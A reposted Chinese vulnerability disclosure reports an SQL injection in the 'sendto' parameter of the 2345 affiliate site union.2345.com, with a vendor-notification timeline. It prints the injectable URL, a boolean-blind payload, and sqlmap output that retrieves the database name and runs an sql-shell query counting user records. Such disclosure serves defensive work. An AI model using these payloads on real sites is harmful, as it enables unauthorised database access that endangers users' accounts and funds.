神刀安全网

漏洞标题: 2345某分站SQL注入

漏洞详情

披露状态:

2016-01-27: 细节已通知厂商并且等待厂商处理中
2016-01-27: 厂商已经确认,细节仅向厂商公开
2016-02-06: 细节向核心白帽子及相关领域专家公开
2016-02-16: 细节向普通白帽子公开
2016-02-26: 细节向实习白帽子公开
2016-03-10: 细节向公众公开

简要描述:

2345某分站SQL注入

详细说明:

2345大联盟 union.2345.com

注入点

http://union.2345.com/jifen/mall/index.php?category=&priceArea=&sendto=1%27%20and%20%271%27=%271

参数sendto

MySQL字符型注入

漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET

Parameter: sendto

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: category=&priceArea=&sendto=1' AND 5387=5387 AND 'UYEU'='UYEU

[13:17:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[13:17:55] [INFO] testing MySQL

[13:17:55] [INFO] confirming MySQL

[13:17:55] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.22

back-end DBMS: MySQL >= 5.0.0

[13:17:55] [INFO] fetching current database

[13:17:55] [WARNING] running in a single-thread mode. Please consider usage of option '–threads' for faster data retrieval

[13:17:55] [INFO] retrieved:

[13:17:55] [WARNING] reflective value(s) found and filtering out

union2345

current database: 'union2345'

影响联盟注册用户,设计用户资金安全

web application technology: Apache 2.2.22

back-end DBMS: MySQL >= 5.0.0

[13:25:25] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER

sql-shell> select count(*) from all_user

[13:25:38] [INFO] fetching SQL SELECT statement query output: 'select count(*) from all_user'

[13:25:38] [WARNING] running in a single-thread mode. Please consider usage of option '–threads' for faster data retrieval

[13:25:38] [INFO] retrieved:

[13:25:38] [WARNING] reflective value(s) found and filtering out

4513

select count(*) from all_user: '4513'

sql-shell>

修复方案:

过滤

版权声明:转载请注明来源 greg.wu@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 2345某分站SQL注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮